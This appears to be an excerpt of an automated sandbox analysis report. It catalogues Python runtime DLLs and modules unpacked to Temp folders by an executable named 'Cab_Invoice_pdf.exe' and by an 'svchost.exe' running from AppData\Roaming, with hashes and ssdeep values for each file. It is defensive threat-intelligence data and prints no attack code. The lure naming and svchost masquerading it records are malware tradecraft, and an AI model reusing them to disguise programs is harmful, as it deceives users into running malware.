                          SHA-256:9F7818513C4A3D482539D83B0F5669D1C92D0E4DE707F028152EF2DC1F071F0E
                          SHA-512:259E001ED7417CFCAC6F8428422048CEB13ED2F814C27345EC55BF619E11F02D6464EFE30445AA6D3FD827582E8E1932DF4F59C9AAC6B0C6E77CB6102CC39607
                          Malicious:false
                          Reputation:unknown
                          Preview: PK..........!...^D............_bootlocale.pycU............e.....................@...sz...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nJz.e.j...W.n4..e.k.rj......e.e.d...r\d.d.d...Z.n.d.d.d...Z.Y.n.X.d.d.d...Z.d.S.).z.A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C...s....t.j.j.r.d.S.t.....d...S.).N..UTF-8.....)...sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r.....Lc:\users\ieuser\appdata\local\programs\python\python38-32\lib\_bootlocale.py..getpreferredencoding....s..........r......getandroidapilevelc....................C...s....d.S.).Nr....r....r....r....r....r....r........s......c....................C...s....t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r....).r....r....r......localer....).r....r....r....r....r....r........s............c....................C...s6...|.r.t...t.j.j
                          C:\Users\user\AppData\Local\Temp\_MEI24122\file.exe.manifest
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1490
                          Entropy (8bit):5.276963138578381
                          Encrypted:false
                          SSDEEP:24:2dt4+iNKg9mMPgi0iiNK+bkgxIme7cb3jgMkb4+GE:cSFKgYSEK+bkgxImeMcn3GE
                          MD5:0AA1B4EF7F524C59405E0F7B3F004920
                          SHA1:24B2A847CC79132566696803636E53CC9D87D79D
                          SHA-256:6F78C922ADC11D653C278685025181E37EE7976C5A57DF34EC297166A82F016D
                          SHA-512:26924E70A196FA455C68BE1DCFEEEC1F507A04BE79DE57A55523939C49F106A46194A379109B9348FF009CF5BBB7B676206FB14BBDFC82DFFD67EC2E77309214
                          Malicious:false
                          Reputation:unknown
                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity type="win32" name="file" processorArchitecture="x86" version="1.0.0.0"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">.. <security>.. <requestedPrivileges>.. <requestedExecutionLevel level="asInvoker" uiAccess="false"/>.. </requestedPrivileges>.. </security>.. </trustInfo>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" language="*" processorArchitecture="*" version="6.0.0.0" publicKeyToken="6595b64144ccf1df"/>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"/>.. </dependentAssembly>.. </dependency>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">.. <application>.. <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>.. <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440
                          C:\Users\user\AppData\Local\Temp\_MEI24122\libcrypto-1_1.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):2234560
                          Entropy (8bit):6.107082014192982
                          Encrypted:false
                          SSDEEP:49152:mIvPtO+ejtvRMO8xxZv1CPwDv3uFfJhFcl:xvPtwjnMO8HZv1CPwDv3uFfJh6
                          MD5:76DA35FDE4E3E110331612AB351A811C
                          SHA1:1836517441C70848DB3F5D4EF4EA0CB2E330732A
                          SHA-256:ECABC901FA89CD771405C004849384A5148644C273A88048AE16C86BD14EF4DD
                          SHA-512:A43DAE59C7D71E38F6365413946EE740C643299403DFE531D0CDBD561623807784830124B786422799AE45852F5AA541B5A94FA8E0947850547E2446BA99BC30
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\libffi-7.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):29208
                          Entropy (8bit):6.643623418348
                          Encrypted:false
                          SSDEEP:384:l69PtXvz8cLBN3gHhY4AFlfIvDzqig2c2LuRRClfW23JLURlV5uH+6nYPLxDG4yG:l65tXvz2CTIvy2c26A35qYvWDG4yG
                          MD5:BC20614744EBF4C2B8ACD28D1FE54174
                          SHA1:665C0ACC404E13A69800FAE94EFD69A41BDDA901
                          SHA-256:0C7EC6DE19C246A23756B8550E6178AC2394B1093E96D0F43789124149486F57
                          SHA-512:0C473E7070C72D85AE098D208B8D128B50574ABEBBA874DDA2A7408AEA2AABC6C4B9018801416670AF91548C471B7DD5A709A7B17E3358B053C37433665D3F6B
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\libssl-1_1.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):538304
                          Entropy (8bit):5.760022892820208
                          Encrypted:false
                          SSDEEP:12288:AqejFQiEYXBYYu3yzOBC4ISRpQuU2lvz/c:xaFJ5zF41TQuU2lvz/c
                          MD5:0E15ACB04CFABDE2A6493FAA49E74280
                          SHA1:E8EAC74A6DA0F1E78C66F84C14CF92DF18CC7E8A
                          SHA-256:A59EC84F8AE6F0174D5C1CE3ABC22B0FDCED6B50F7C8B689367AC859AC9E08E7
                          SHA-512:12D24D5FD42829FD0F89A1E42F46CD498D71E441EC803161319E721A3280406589B540EC949BBB6C0AF661CE806BA50A1097B7793C9A1CCC83061DEC4FC753AD
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\pyexpat.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):168624
                          Entropy (8bit):6.629244601257658
                          Encrypted:false
                          SSDEEP:3072:ZhgFHiME7l8Z5bYwLoE8KZKGjUdGjN81IuBhh7Eu0:QFHc7l8ZORKZKGjtjN8E
                          MD5:6E2329BA53FF8B6E2E4069A859EE3FCE
                          SHA1:1C067F16A3069A44EDF7A073FA35B70B86F99405
                          SHA-256:27363A2DCDD990DEF43307B1644DC03304F9478830C8989C49F9DA2491889E6E
                          SHA-512:C0FCC4F0AE5C019ADAE3593F81BA26CA8C5CF6A7C15B78FD42B052DBDA6CBDEFDC6F8FA52C3FD614F1B17F48725D58CA23972C8B7C183EAFC0D542251A9EF23D
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\python38.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):4052656
                          Entropy (8bit):6.720992659261596
                          Encrypted:false
                          SSDEEP:49152:NgQmEhbJSgm06kaUr9Alta2tPfx1CI8jXHB7MZnCPYJAT37PtLKK4WoooOA:iEWg5uta2/8LHxMZBJ4lKKoooOA
                          MD5:7B97AB4F12ED448B26669B83F9061BEF
                          SHA1:0E2516F3DC50EFB7FAA0B276830B4F95D8084772
                          SHA-256:E7312737C82CC967FB669AE4C2736CB005F4192E1654C717DBDC5986E562957B
                          SHA-512:4F123981982EA4AFFE230CBDCDBEC9DE419D4F3D92C026B2DF3DA7D2BE9BEFAAB707167265CFC97FF183F13A60BE6C53FB541E00F518BEACE819B8B9B4927D8A
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\pywintypes38.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):115712
                          Entropy (8bit):6.533866514211769
                          Encrypted:false
                          SSDEEP:3072:QCf+6EE1b22/q4+ldC56PsZyLY7b00nPO4KMGSncyl8ZpFI:h+xE1iz4+ldC5msYLY7b00PO4KMGScyW
                          MD5:3206CF4CD05B9E993A822C0DAC05B1D0
                          SHA1:F49E809FB19BC1E24F1A7904663375554BD4D5CD
                          SHA-256:9A3B70353BB9346BF1ECD2784164FEAF6DBC9CB969298091F549EF8269AEF930
                          SHA-512:A6A4AA66E264E2438DF573D31DA0827650F48F4877ECABF391D284C99019E041F3333A708E2657FFC565B0CB9933D9C7A77B3726B8F4EC0DDA5DA3C5E8AB68C0
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\select.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):24752
                          Entropy (8bit):6.44568082211825
                          Encrypted:false
                          SSDEEP:384:Tg7oA2vjUzNJmTgj0nq1RiPFdd+k1IumGEKDG4y8cLrhX:ccnvjANJiXnqSdWk1IumGEKDG4yLrhX
                          MD5:404C4F2FF59DA1993518D39754376606
                          SHA1:560A0F8A301EF5FEF541C6CE64975E3AA1AD1460
                          SHA-256:BB4FE62B14AD6FC559A1D88339D0F302450DAFEC09CF6027069F66B6D5BEF1AB
                          SHA-512:585ECF2B3DA37F1144191A70CA7C29151DE3C6BC1943719318BC291B29A08BB7E4A8C6200F8C743DF8BD32225221CADEB8306450B7E491B9B16AA94587711169
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\ucrtbase.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1142072
                          Entropy (8bit):6.809041027525523
                          Encrypted:false
                          SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                          MD5:D6326267AE77655F312D2287903DB4D3
                          SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                          SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                          SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\unicodedata.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1091248
                          Entropy (8bit):5.360848319038452
                          Encrypted:false
                          SSDEEP:12288:gJz3Q191SnFRHotduNpqQOZ6gBjCmN/X4GyCAx9++bBlhJk93cgewrxEekMGv:gJ3KSogG7hCc/4D9nbDhG2wr0MGv
                          MD5:5FB1A0234305D5B69DB79B4F7F89EBCA
                          SHA1:9A6EF3DD3A024B433566AC20146344A1F0631F9B
                          SHA-256:D9AF40281331CF55E21E20A57342FE86C6C729906D6A3AF3F3F3AD00F2284ABE
                          SHA-512:FE52C0AE494459B8D015E2E28AF92BDCF6A491DC424D803B3E87E21612C4654136335E5399F5CA0FEF4717EECE75D53AC11050623E109E4F7ED59392D74A9085
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\win32api.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):104960
                          Entropy (8bit):6.460606710335285
                          Encrypted:false
                          SSDEEP:3072:KloBRQj7JH+VldRcmShLAG9wRcM7RSuQrbCQGt5Ne/eo:KloBa4ncmhWKUu/7t5Nen
                          MD5:2866BF1A085564A0F63B76173943BA64
                          SHA1:CAF810657651B1EC3F667A671E8F9307EEEA98B7
                          SHA-256:3021294B610E01ABD37289DDBE2BF0507E7DE3FCB678E07525EC4E0892747955
                          SHA-512:D1090831BA6D06C09F1DFE2790B435020854E328F9826937244C13CDDB1080CAB35F3679AB34EB44D88F9BECF4CCF933CD2EBE1B5CC853758BFA9BC04B002068
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\win32event.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):22016
                          Entropy (8bit):5.972372003642818
                          Encrypted:false
                          SSDEEP:384:AkUKkjmkLfkoke6am07BxEjr6p+zDLIkOn/T7AdlF7EpmkteAi5tjVUjaPGaCG:A3KwmwfzkAHUr6uQkG/T7AdlF7Epmktl
                          MD5:29EC0D47B88A465F69B5E18A3D35E1D0
                          SHA1:91739F4227A6DFA4F1F107DD19D01B9E2C90C177
                          SHA-256:9BA207206559F40D534100DF3C847E2A67D8008A8EE98E991D5CD6B0813B8624
                          SHA-512:552F4C4892C453B64CE84D8DBEB9B15E3506A0666867AF5CFB28C6B167E2C81F8EED0A8598DEEBB38C90D0B2CCBEC69223C2D487256541D041D85B2F0FDC871D
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI24122\win32gui.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):176128
                          Entropy (8bit):6.424412252153223
                          Encrypted:false
                          SSDEEP:3072:uVvRKIA/oqLcDwPY5Fej7oLyqx9NkdMiCawrLwCNzR0jzlZ+6KLDtW8d7U:6RNA/oqLcDwPY5FeCNkdMiCasvRIK6KE
                          MD5:844D345409407D3C470219342EFBD80C
                          SHA1:70612D8676009CC780ABE61583996473F027334A
                          SHA-256:42898717D0D574B6C4BEAD3C07A67368FCBFC49F498997A3A08E24612F4EF365
                          SHA-512:8A54414DA2D72331441AE5F47690F91C676ED6CD2B96B57AAE783774E5A1FE03F225DDD1DFDAE77E93897E3AE3DA7609A99448184C6BB1D92D3D600BAD17D7A4
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\Include\pyconfig.h
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:C source, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):21096
                          Entropy (8bit):5.30196060437062
                          Encrypted:false
                          SSDEEP:384:rG3tApdkHRMYURIn1/8BsRV4ig8as8Ji2MgsdgTaXgDV:rG3tApWySE+aPfZXvV
                          MD5:31FEF4BD7506D25D27BF596F949A2066
                          SHA1:41F1D3A07B331220DAEA0B106D29D2A2DB74B45E
                          SHA-256:12347EF4F8CA786D33CAC569DDF61ACBDC506F986D1AA34F3BAAD8C062543DD3
                          SHA-512:062A1EF84DB04D91810CF81604A23E5226326E0BAD0B66077A22D05AC3EF6A06B36EFEBC0552FE2C0FAA17221275E95E77D11B952A29B6D3C3DB144622336B77
                          Malicious:false
                          Reputation:unknown
                          Preview: #ifndef Py_CONFIG_H..#define Py_CONFIG_H..../* pyconfig.h. NOT Generated automatically by configure.....This is a manually maintained version used for the Watcom,..Borland and Microsoft Visual C++ compilers. It is a..standard part of the Python distribution.....WINDOWS DEFINES:..The code specific to Windows should be wrapped around one of..the following #defines....MS_WIN64 - Code specific to the MS Win64 API..MS_WIN32 - Code specific to the MS Win32 (and Win64) API (obsolete, this covers all supported APIs)..MS_WINDOWS - Code specific to Windows, but all versions...Py_ENABLE_SHARED - Code if the Python core is built as a DLL.....Also note that neither "_M_IX86" or "_MSC_VER" should be used for..any purpose other than "Windows Intel x86 specific" and "Microsoft..compiler specific". Therefore, these should be very rare.......NOTE: The following symbols are deprecated:..NT, USE_DL_EXPORT, USE_DL_IMPORT, DL_EXPORT, DL_IMPORT..MS_CORE_DLL.....WIN32 is still required for the locale modul
                          C:\Users\user\AppData\Local\Temp\_MEI61562\VCRUNTIME140.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):76168
                          Entropy (8bit):6.781149490150774
                          Encrypted:false
                          SSDEEP:1536:zgTqURG2vo0RwvI7sjBH+cOKXc36r23oEecbi0mju:zdURhvZ6vIQVrPypecbi0m
                          MD5:87DD91C56BE82866BF96EF1666F30A99
                          SHA1:3B78CB150110166DED8EA51FBDE8EA506F72AEAF
                          SHA-256:49B0FD1751342C253CAC588DDA82EC08E4EF43CEBC5A9D80DEB7928109B90C4F
                          SHA-512:58C3EC6761624D14C7C897D8D0842DBEAB200D445B4339905DAC8A3635D174CDFB7B237D338D2829BC6C602C47503120AF5BE0C7DE6ABF2E71C81726285E44D6
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_asyncio.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):57520
                          Entropy (8bit):6.4179566473980465
                          Encrypted:false
                          SSDEEP:1536:0iULU9Lbx5udbmDoOTXPnbhyBDmuo2iwBIuYncjNayr:0i4MLLbhamuo2iwBIuYncj3
                          MD5:54414D216C4DEA54799DC0F5CE657FBE
                          SHA1:0043CFCAE73985C7739ABDF6DBB0E4291EFDB5D2
                          SHA-256:CEF9A3D83E7CC45D99D666A6F8E7E58CC68ACB14E8858FE5BC6ED54A0F7C3898
                          SHA-512:F3CB7C8D38E59EB8F9A1CF693AD032FD560B4CCCB604B11C1BAE837FE045591C969A7E1EDF35F1BA9546EEF0E3C5D0D70188393B3C656B91ED95736AFC8A5358
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_bz2.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):79536
                          Entropy (8bit):6.643809455301382
                          Encrypted:false
                          SSDEEP:1536:02MfT59id2pNXdCQXa64t3oS8bOWUwXpIuMVwqJyb:0T/5pNXdFa6llbOWUwXpIuMVwq0
                          MD5:445CE6BCEFB6EDDF0D953DBA17E0B320
                          SHA1:3D5FB5EEC6ECA27D37CAAE31F173DFD53909C74C
                          SHA-256:CF721704D96F071DE10A1E174A07BB1211864EA588CE1C4D6023F11701AAAB13
                          SHA-512:31B2247CB06C1905AE6857CC6FC23A9FC5E1C4FB7E76229D7444B417353A3EC76412DE73FF08750C09F5D1AD8644B8C07D79B3820E594AFE997DC733F610AA41
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_ctypes.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):117424
                          Entropy (8bit):6.568932798472365
                          Encrypted:false
                          SSDEEP:1536:UhnXb10JQfHRFDrz2EH7EHURqBcNVValsffwv3TuLlbuRB/FfZWxOSQKkx1IuBPO:UhnLAI5xVVals3Py/FZWobKU1IuBPxEP
                          MD5:286CE553108A74197DF006D71D31918F
                          SHA1:01A9FDE2833F2FC684A442169480ECFC8F1559D0
                          SHA-256:13A45B718DF8CB4C0218F720C396973F8A501678C6CB6EF9380730C97553EE8C
                          SHA-512:3CA8AB25B4B069C702E02226623C0CEA55CDB7EC3FEEA50C81A0A2350BDCB9B5BB2C2D7768C810743024EA99568F20DF51ACC4AF28DAACDE0AF18F0F5D6B7A1F
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_decimal.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):228528
                          Entropy (8bit):6.825703510403188
                          Encrypted:false
                          SSDEEP:6144:vISxoQN8s3Hs6B+ruCQxuqaxV3XMW5gVrserORH0i:vISxoS8s3HSruCQ6userOhv
                          MD5:DD8724365CDF7372892B0220BC8007C0
                          SHA1:0C43CFABCD2FD710432C7E76CF58CFEDE05F9069
                          SHA-256:FF753B671FE3A1D09B4676A0E08F85A4B19D0F5DD06B50DCA31339911730F343
                          SHA-512:42AF80495E1FA96A438ECE00D896D02BF3249BC4832CB182511384DB438A41F07A54A6F3F03FD992F32901A4D684E66EF337BA379CB0C9245A621CD04DB26B0D
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_hashlib.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):39088
                          Entropy (8bit):6.576705962671287
                          Encrypted:false
                          SSDEEP:768:cAtCkdtp99Be3oOQi2ApPXl/mr/2IBIuYIBpLDG4y2jha:cAckdtp9/2oOQi3pfVm/2IBIuYIZyt
                          MD5:76A7E9C182FB34121881B868829786E5
                          SHA1:40392A3BAD97AA8C7C7C7ADD34A59F170E917747
                          SHA-256:D6F37E0BC993D76BFD3D8F28963E0936D893C3EA1B6A4B2ABCB06A053FF0BB94
                          SHA-512:4CE0AD1149F6A2619DFA17DDFC46AE3ECBE18A2A111A3457DF99B84B6F8768FCDB6470C3B0F93C08D43B06218C56EC19C7D21A6D4AEEB86F98A51DBCBCBBEC7D
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_lzma.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):159408
                          Entropy (8bit):6.960223316470766
                          Encrypted:false
                          SSDEEP:3072:wV3Rr96Jf12nMU7gc22JNO2cUDQoxXChHALHuki4zHfBg9mNoaCmERoTpIuD1qyO:+hkFPMrxyhHALHEOpgYObdRoT0R
                          MD5:45D91843D03A51354A43D8DCECDF22E1
                          SHA1:C982DCDCEE7B2D64AEAA478D8FFE0087B64E391D
                          SHA-256:DB9ABC004E8DA4511025E47A255727CB45111195C6AEB6D50B61A037D7408D0A
                          SHA-512:34A13E0445499F7B655C40D9431710FDCCF1BFDA1C7477F23481E7C42526284736714ED38949F91098131F80B635631E3A0BA73DD3734D4E0759EE7F32968364
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_multiprocessing.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):26800
                          Entropy (8bit):6.4189500308991985
                          Encrypted:false
                          SSDEEP:384:p6hMLUifrlrCojAelk6WPw6DsuOZRIuABLipJXj0DG4y8V5OB8hU:7lr9WY298RIuAtin0DG4ymFhU
                          MD5:DBEC7953A3000BB513B26A26F6C1128D
                          SHA1:B4CBF27FAB8DF534BE31D021E4C49C42161D4CBF
                          SHA-256:307046C4F970F910968EDDC6CB9B65767FA3A70C05AA966DD6434021FEEEBDDC
                          SHA-512:2C4D84F5D27E2EB84C1867223C147AB7B5F3C0B72671A5FBCC5936B3449D683AEBD7D3D2F07B4F4203E5D6523F0BD3F8314773567D5FB6FD7262A3CEBC84D20F
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_overlapped.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):40112
                          Entropy (8bit):6.515613246434881
                          Encrypted:false
                          SSDEEP:768:iW1TpulXdyBdthIw5o8IYkITWb7PkNIuttgHDG4y5Eh8i:EXdyBdRTTWb7PkNIuttghydi
                          MD5:4E5C64134B6C40E187B7F8627A6D8A2D
                          SHA1:F5C6AFFAB5A1D14D8B586A1893E136D87DDAAD75
                          SHA-256:5EEF3EB8F87D332128569E4810F9283FF57417F1BB67D59D1AB2F471505DC1B1
                          SHA-512:7D6783D20AEC060BB1D5C72FADC8D52EF6812EE0776851C96FA2AD21B66C9FA853F5F43B8B775C8A741BD2B35938E2FCCAC16A829E37F7C425978C59BA62B60B
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_queue.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):26288
                          Entropy (8bit):6.44734679501627
                          Encrypted:false
                          SSDEEP:768:XH9qUbFuF16rtrazup1IumUYllDG4yzFhj:3AUbFYktrazup1IumUYlvyH
                          MD5:963DD36AEC3EDB74C533B91C5A37498E
                          SHA1:5B553F18630F25C52A41BED0AC9C6262CCA662DA
                          SHA-256:D0E208BF308030C4BF879BA2A17FBEED48E10DD76C0DBDC9EB3D5F7A990302F6
                          SHA-512:513438B82C62BF26079BFD42CF6C562F7DF02A3190B246D9FB32B4342766C27EB77DEF8DE8D748B71C483CEC2B88DD9EDAE367ABFE8C157D135A259A8D859D48
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_socket.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):69808
                          Entropy (8bit):6.611317372453449
                          Encrypted:false
                          SSDEEP:1536:+NU6t0wKLlEIOiKISMD9f8+LeJzJbHjW/Z1IuBwC8lYHy/:+NPt0wKLlfkMD9f8ueJdbHi/Z1IuBwpL
                          MD5:FB09559F0C1C4DC91DFBE361828B0E39
                          SHA1:E38A5B68F38E6FFF3C276CEA2B40620B33295879
                          SHA-256:5EC25AD36306076275E094FCE70E150C632B193C916847535DF3904545F879F0
                          SHA-512:6D9BAE50E82F0B57240EFA2E637DE01C16CF1AEAAF95DD9F4B3DDF391CE163D140C06549243EF8D370D76A866190A49A1C1D8E8C0177CE8A709C574A1220E86C
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_ssl.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):143024
                          Entropy (8bit):6.46611957726107
                          Encrypted:false
                          SSDEEP:3072:Z8wJl2IslifCkaWuNPTTT/TpvdSRyOvm5GgDdhpIuM7GHux3P:Zpl2IsMDuTT/T/SRMGgDrqx
                          MD5:50F9B63B7632255FE69ABE0C2B4FAE04
                          SHA1:623BB9731CC5AA99EEB7C28DDF949495B0501717
                          SHA-256:0A7786AD8A9D4A24BD84B520BB7A8862DF949ABFCF10027172AAF0E3A18EDE7A
                          SHA-512:B35536AD316D7FABF7617451F9A4AC2088A473A97E8E023BB7AB55C50707ED9E7B3CAC2C72CE98A5F6D2CC56DF2A5D5A6B149110994006F76937BC22644D9273
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_win32sysloader.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):11776
                          Entropy (8bit):5.256625843110757
                          Encrypted:false
                          SSDEEP:192:U48hFSvy3GI5DBb7qqAcUkOJk4fgF6O/G9RdfzaYy/o:sq8zb7DAcUkOJF3O/8I/
                          MD5:D9026D178C4220AA2C40CA592E31F5C6
                          SHA1:1EDD3463DA5AB5B442FCFBFB4E9A70940B7A5A76
                          SHA-256:D5E2378B9028810872ADE3AD7591B716466EAE621CA5B6FFFB4822949A9ABF9A
                          SHA-512:00251232772E5BAAF314DE7E8263229094D4057763620A3C929623E3C93CD30C8FA5243015434318CA9A4DFA8F2E82F9519AB6CF55F232D97296F0B5F93D376B
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-console-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.080160932980843
                          Encrypted:false
                          SSDEEP:192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
                          MD5:502263C56F931DF8440D7FD2FA7B7C00
                          SHA1:523A3D7C3F4491E67FC710575D8E23314DB2C1A2
                          SHA-256:94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
                          SHA-512:633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-datetime-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.093995452106596
                          Encrypted:false
